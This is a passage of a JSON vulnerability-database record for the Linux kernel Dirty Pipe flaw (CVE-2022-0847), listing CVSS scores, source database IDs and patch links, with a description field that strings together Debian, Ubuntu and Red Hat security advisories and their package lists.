"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.6
},
"cve": "CVE-2022-0847",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-0847",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2022-0847",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-0847",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-0847",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-0847",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-0847",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-522",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-0847",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"description": {
"_id": null,
"data": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nCVE-2021-43976\n\n Zekun Shen and Brendan Dolan-Gavitt discovered a flaw in the\n mwifiex_usb_recv() function of the Marvell WiFi-Ex USB Driver. \n\nCVE-2022-24448\n\n Lyu Tao reported a flaw in the NFS implementation in the Linux\n kernel when handling requests to open a directory on a regular file,\n which could result in a information leak. \n\nCVE-2022-25258\n\n Szymon Heidrich reported the USB Gadget subsystem lacks certain\n validation of interface OS descriptor requests, resulting in memory\n corruption. \n\nCVE-2022-25375\n\n Szymon Heidrich reported that the RNDIS USB gadget lacks validation\n of the size of the RNDIS_MSG_SET command, resulting in information\n leak from kernel memory. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 5.10.92-2. 
\n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmImAChfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0TlAw/+MoL+9zYTlpPOcWp0YMuOkEUJU3WS7udSyTSZLNZsWuQTVmPQ6ed7Fxw/\nb0j6OCX9HbrIl4nJdx+7D53ujWC6hS29TLgHCb8d/TEeluXPVI2+4Nt1FcZbSXTJ\n6hBNIVVIiDUV9Wco8JUVbvk+y8VCsHxqDEePpEOTZVYLyDUUdti4V7+3ZyO8XQ4/\nePeCX8QQba5FApsz4jG7CkBCxBxyley6YswPV3Zz1FF6L/hGjgluYiKFbO4mLTlX\nvqwv/UIAZl2rutHzzxyBE5hIlPGXfgksPI7jTmSMRkWI99cIlJWTlziecYLQUiid\n2NwOyu2vrut6ZVbtmI5WbTy64Aa9EKguQLd+SbBMuK790nfTLRySaZnU52/1j1MW\n1/3Nwq+pDbZ/yAAeV/TS9oKl3mG3XVOO34EGpr9A5aZzCPetyb1TQj0jR5+mjCxy\nRTxYZuCrisnFvVXXRZLPc1vPcZW+ULXrPQFWEEvd2WKRa6iIkDHf5ef8pHRm36mk\n9Yt0x6UmmVWLRRZp7UCbD03NB5p3oJKi+i1h3d+19jQGwU2bEhfOEADCADqlZLwc\n/6vFZ7TrA/74LXM8MOc5+VQbxL8nGetenPSHuxNwoeXw1ry4+x9KV6YHMqeqQ/qW\njFpIOfWS1HQ9vC9t46V2eE0sfrOu2Jvdm4MixwRbXhjzs/REYTY=\n=MIhw\n-----END PGP SIGNATURE-----\n. This update provides security fixes, bug\nfixes, and updates the container images. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.3 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. 
\nSee the following Release Notes documentation, which will be updated\nshortly for this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* search-ui-container: follow-redirects: Exposure of Private Personal\nInformation to an Unauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\n* openssl: Infinite loop in BN_mod_sqrt() reachable when parsing\ncertificates (CVE-2022-0778)\n\n* imgcrypt: Unauthorized access to encryted container image on a shared\nsystem due to missing check in CheckAuthorization() code path\n(CVE-2022-24778)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)\n\nRelated bugs:\n\n* RHACM 2.4.3 image files (BZ #2057249)\n\n* Observability - dashboard name contains `/` would cause error when\ngenerating dashboard cm (BZ #2032128)\n\n* ACM application placement fails after renaming the application name (BZ\n#2033051)\n\n* Disable the obs metric collect should not impact the managed cluster\nupgrade (BZ #2039197)\n\n* Observability - cluster list should only contain OCP311 cluster on OCP311\ndashboard (BZ #2039820)\n\n* The value of name label changed from clusterclaim name to cluster name\n(BZ #2042223)\n\n* VMWare Cluster creation does not 
accept ecdsa-sha2-nistp521 ssh keys (BZ\n#2048500)\n\n* clusterSelector matchLabels spec are cleared when changing app\nname/namespace during creating an app in UI (BZ #2053211)\n\n* Application cluster status is not updated in UI after restoring (BZ\n#2053279)\n\n* OpenStack cluster creation is using deprecated floating IP config for\n4.7+ (BZ #2056610)\n\n* The value of Vendor reported by cluster metrics was Other even if the\nvendor label in managedcluster was Openshift (BZ #2059039)\n\n* Subscriptions stop reconciling after channel secrets are recreated (BZ\n#2059954)\n\n* Placementrule is not reconciling on a new fresh environment (BZ #2074156)\n\n* The cluster claimed from clusterpool cannot auto imported (BZ #2074543)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2032128 - Observability - dashboard name contains `/` would cause error when generating dashboard cm\n2033051 - ACM application placement fails after renaming the application name\n2039197 - disable the obs metric collect should not impact the managed cluster upgrade\n2039820 - Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard\n2042223 - the value of name label changed from clusterclaim name to cluster name\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048500 - VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature authenticated user can obtain the privileges of the System 
account\n2053211 - clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2053279 - Application cluster status is not updated in UI after restoring\n2056610 - OpenStack cluster creation is using deprecated floating IP config for 4.7+\n2057249 - RHACM 2.4.3 images\n2059039 - The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift\n2059954 - Subscriptions stop reconciling after channel secrets are recreated\n2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates\n2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server\n2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path\n2074156 - Placementrule is not reconciling on a new fresh environment\n2074543 - The cluster claimed from clusterpool can not auto imported\n\n5. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\nBug fix:\n\n* RHACM 2.3.8 images (Bugzilla #2062316)\n\n3. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2062316 - RHACM 2.3.8 images\n\n5. =========================================================================\nUbuntu Security Notice USN-5362-1\nApril 01, 2022\n\nlinux-intel-5.13 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-intel-5.13: Linux kernel for Intel IOTG\n\nDetails:\n\nNick Gregory discovered that the Linux kernel incorrectly handled network\noffload functionality. A local attacker could use this to cause a denial of\nservice or possibly execute arbitrary code. (CVE-2022-25636)\n\nEnrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano\nGiuffrida discovered that hardware mitigations added by ARM to their\nprocessors to address Spectre-BTI were insufficient. A local attacker could\npotentially use this to expose sensitive information. (CVE-2022-23960)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\nproperly restrict pointer types in certain situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2022-23222)\n\nMax Kellermann discovered that the Linux kernel incorrectly handled Unix\npipes. A local attacker could potentially use this to modify any file that\ncould be opened for reading. 
(CVE-2022-0847)\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nWilliam Liu and Jamie Hill-Daniel discovered that the file system context\nfunctionality in the Linux kernel contained an integer underflow\nvulnerability, leading to an out-of-bounds write. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2022-0185)\n\nEnrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano\nGiuffrida discovered that hardware mitigations added by Intel to their\nprocessors to address Spectre-BTI were insufficient. A local attacker could\npotentially use this to expose sensitive information. (CVE-2022-0001)\n\nJann Horn discovered a race condition in the Unix domain socket\nimplementation in the Linux kernel that could result in a read-after-free. \nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2021-4083)\n\nIt was discovered that the NFS server implementation in the Linux kernel\ncontained an out-of-bounds write vulnerability. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2021-4090)\n\nKirill Tkhai discovered that the XFS file system implementation in the\nLinux kernel did not calculate size correctly when pre-allocating space in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2021-4155)\n\nIt was discovered that the AMD Radeon GPU driver in the Linux kernel did\nnot properly validate writes in the debugfs file system. A privileged\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. 
(CVE-2021-42327)\n\nSushma Venkatesh Reddy discovered that the Intel i915 graphics driver in\nthe Linux kernel did not perform a GPU TLB flush in some situations. A\nlocal attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2022-0330)\n\nSamuel Page discovered that the Transparent Inter-Process Communication\n(TIPC) protocol implementation in the Linux kernel contained a stack-based\nbuffer overflow. A remote attacker could use this to cause a denial of\nservice (system crash) for systems that have a TIPC bearer configured. \n(CVE-2022-0435)\n\nIt was discovered that the KVM implementation for s390 systems in the Linux\nkernel did not properly prevent memory operations on PVM guests that were\nin non-protected mode. A local attacker could use this to obtain\nunauthorized memory write access. (CVE-2022-0516)\n\nIt was discovered that the ICMPv6 implementation in the Linux kernel did\nnot properly deallocate memory in certain situations. A remote attacker\ncould possibly use this to cause a denial of service (memory exhaustion). \n(CVE-2022-0742)\n\nIt was discovered that the VMware Virtual GPU driver in the Linux kernel\ndid not properly handle certain failure conditions, leading to a stale\nentry in the file descriptor table. A local attacker could use this to\nexpose sensitive information or possibly gain administrative privileges. \n(CVE-2022-22942)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.13.0-1010-intel 5.13.0-1010.10\n linux-image-intel 5.13.0.1010.11\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. 
\nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5362-1\n CVE-2021-4083, CVE-2021-4090, CVE-2021-4155, CVE-2021-42327,\n CVE-2022-0001, CVE-2022-0185, CVE-2022-0330, CVE-2022-0435,\n CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-0847,\n CVE-2022-22942, CVE-2022-23222, CVE-2022-23960, CVE-2022-25636\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2022:0819-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0819\nIssue date: 2022-03-10\nCVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 \n CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 \n CVE-2022-22942 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\nRed Hat Enterprise Linux for Real Time (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. 
\n\nSecurity Fix(es):\n\n* kernel: improper initialization of the \"flags\" member of the new\npipe_buffer (CVE-2022-0847)\n\n* kernel: Use After Free in unix_gc() which could result in a local\nprivilege escalation (CVE-2021-0920)\n\n* kernel: local privilege escalation by exploiting the fsconfig syscall\nparameter leads to container breakout (CVE-2021-4154)\n\n* kernel: possible privileges escalation due to missing TLB flush\n(CVE-2022-0330)\n\n* kernel: remote stack overflow via kernel panic on systems using TIPC may\nlead to DoS (CVE-2022-0435)\n\n* kernel: cgroups v1 release_agent feature may allow privilege escalation\n(CVE-2022-0492)\n\n* kernel: failing usercopy allows for use-after-free exploitation\n(CVE-2022-22942)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel symbol \u0027__rt_mutex_init\u0027 is exported GPL-only in kernel\n4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)\n\n* kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree\n(BZ#2045589)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation\n2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout\n2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush\n2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation\n2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS\n2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation\n2060795 - CVE-2022-0847 kernel: improper initialization of the \"flags\" member of the new pipe_buffer\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 
8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl\nISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k\nord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t\n/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG\nIODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F\nGbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ\nypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW\nIOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm\nQfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j\nKIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE\nX1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w\nnEhPbkKSmMY=\n=CLN6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-0847"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-0847",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "166229",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "166258",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "166230",
"trust": 2.4
},
{
"db": "SIEMENS",
"id": "SSA-222547",
"trust": 1.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-167-09",
"trust": 1.4
},
{
"db": "PACKETSTORM",
"id": "176534",
"trust": 1.0
},
{
"db": "JVN",
"id": "JVNVU99030761",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166812",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166516",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166569",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166241",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166280",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166305",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032843",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031421",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022030808",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042576",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031308",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031036",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1027",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0965",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2981",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1405",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1064",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0944",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022030042",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022030060",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50808",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-0847",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169268",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166265",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166264",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"id": "VAR-202203-0043",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26739928
},
"last_update_date": "2026-04-10T21:54:57.588000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Bug\u00a02060795",
"trust": 0.8,
"url": "https://fedoraproject.org/"
},
{
"title": "Linux kernel Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=184957"
},
{
"title": "Red Hat: Important: kernel-rt security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220822 - Security Advisory"
},
{
"title": "Red Hat: Important: kernel security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220831 - Security Advisory"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-0847"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-0847"
},
{
"title": "Dirty-Pipe-Oneshot",
"trust": 0.1,
"url": "https://github.com/badboy-sft/Dirty-Pipe-Oneshot "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-665",
"trust": 1.0
},
